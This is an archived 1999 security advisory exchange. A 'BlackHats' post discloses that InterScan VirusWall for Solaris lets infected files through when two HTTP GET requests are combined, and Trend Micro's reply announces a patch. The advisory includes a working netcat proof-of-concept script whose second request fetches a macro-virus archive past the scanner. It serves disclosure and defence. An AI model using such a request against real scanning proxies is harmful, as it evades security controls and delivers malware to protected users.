interscan.viruswall.txt

`Date: Mon, 22 Feb 1999 21:31:51 +0100  
From: The Unicorn <[email protected]>  
To: [email protected]  
Subject: BlackHats Advisory -- InterScan VirusWall  
  
BlackHats Security Advisory  
  
  
Release date: February 22, 1999  
Application: InterScan Viruswall for Solaris  
Severity: Any user can download binaries and virus  
infected files though the VirusWall  
  
Author(s): [email protected], [email protected]  
  
---  
Overview :  
---  
  
InterScan VirusWall is part of Trend Micro's integrated family  
of virus protection products that covers every access point - Internet  
gateways, groupware, e-mail and intranet servers, LAN servers, and  
desktops. InterScan VirusWall scans inbound and outbound SMTP mail and  
attachments, FTP and HTTP traffic in real time. It automatically cleans  
infected files and detects malicious Java applets and ActiveX objects.  
  
When two HTML GET commands are combined in one request, of wich  
the former points to a non-scanned file like a graphic image (i.e. a GIF  
file) and the latter to a possibly infected binary or macro file, both  
of the files are passed to the user requesting the data without any  
warning or logging by the VirusWall. We found that this combination  
was sometimes generated by well-known web browsers like Netscape  
Communicator and Microsoft Internet Explorer during normal use.  
  
We informed Trend Micro of this vulnerability more than three  
weeks ago. We fully described the problem to Trend Engineering and  
included an exploit similar to the one described below and all traffic  
between the browser and VirusWall, but did not receive a fix for this  
problem. The explanation received was that they were unable to reproduce  
it on their systems. Since these systems are used to protect people  
behind (expensive) firewall configurations against virus infection, we  
decided to make, at least, the administrators of these systems aware of  
this exploit that can be used by users behind an InterScan VirusWall  
configuration to circumvent the implemented security policy.  
  
---  
Affected systems:  
---  
  
InterScan Viruswall for Solaris  
Implementations of InterScan VirusWall on other platforms are  
likely to be vulnerable, but are not tested since we do not have  
them available  
  
---  
Workarounds/Fixes:  
---  
  
We have not yet received a fix from Trend Micro. It might be  
possible to close this hole by scanning *ALL* data passed in HTTP  
traffic, but this will have a negative influence on the throughput of  
the complete firewall configuration.  
  
---  
Example:  
---  
  
We developed the following exploit that requests two files in  
one message. The first one is a simple graphic file (in this case form  
the Trend Micro web-site) and the second one is a file containing a well  
known macro-virus, which would normally be detected and removed by the  
product. Using the netcat tool we send this combined request out to the  
world using the VirusWall as a proxy-server. The information received  
back is stored in a file. When later examining the file we find both the  
graphic and the virus infected contents requested. Looking through the  
logfiles no trace is found of this file seeping through the hole.  
  
#!/bin/sh  
echo "GET http://www.antivirus.com/vinfo/images/amb1.gif HTTP/1.0  
Referer: http://www.antivirus.com/index.html  
Proxy-Connection: Keep-Alive  
User-Agent: Mozilla/4.5 [en] (WinNT; I)  
Host: www.antivirus.com  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg image/png  
Accept-Encoding: gzip  
Accept-Language: en  
Accept-Charset: iso-8859-1,*,utf-8  
  
GET http://sourceofkaos.com/homes/knowdeth/virii/boom-a.zip HTTP/1.0  
Referer: http://sourceofkaos.com/homes/knowdeth/index.html  
Proxy-Connection: Keep-Alive  
User-Agent: Mozilla/4.5 [en] (WinNT; I)  
Host: sourceofkaos.com  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,  
image/png, */*  
Accept-Encoding: gzip  
Accept-Language: en  
Accept-Charset: iso-8859-1,*,utf-8  
  
" | nc viruswall 80 > the.results  
  
Changing the second part of this "code" will enable downloading  
any information through the Trend Micro InterScan VirusWall. Probably  
because the product only acts on the first GET command in a message,  
while retrieving all information requested.  
  
---  
Further Study:  
---  
  
Further study of this vulnerability may focus on FTP and SMTP  
traffic and the detection of malicious Java applets and ActiveX objects.  
  
  
Ciao,  
Unicorn.  
--  
======= _ __,;;;/ TimeWaster ================================================  
,;( )_, )~\| A Truly Wise Man Never Plays  
;; // `--; Leapfrog With A Unicorn...  
==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind! =======  
  
----------------------------------------------------------------------------------  
  
Date: Thu, 25 Feb 1999 12:28:46 -0800  
From: Bob Li <[email protected]>  
To: [email protected]  
Subject: Patch for InterScan VirusWall for Unix now available  
  
We have been recently notified about a potential security hole in our  
InterScan Web VirusWall for Solaris product via the "BlackHats Security  
Advisory". The potential problem described relates to being able to  
download binaries and virus infected files by using HTTP proxy "keep-alive"  
connections.  
  
We have looked into the description of the problem and have identified that  
there was a  
problem with the software. As a result, we are issuing a patch which can be  
obtained from Trend Micro at http:://www.antivirus.com to resolve the  
problem.  
  
This issue applies to InterScan for Solaris and HP-UX. The Windows NT  
version of InterScan does not have this problem.  
  
Bob Li  
Product Manager  
Trend Micro, Inc.  
E-Mail: [email protected]  
Phone: 408-863-6341  
  
`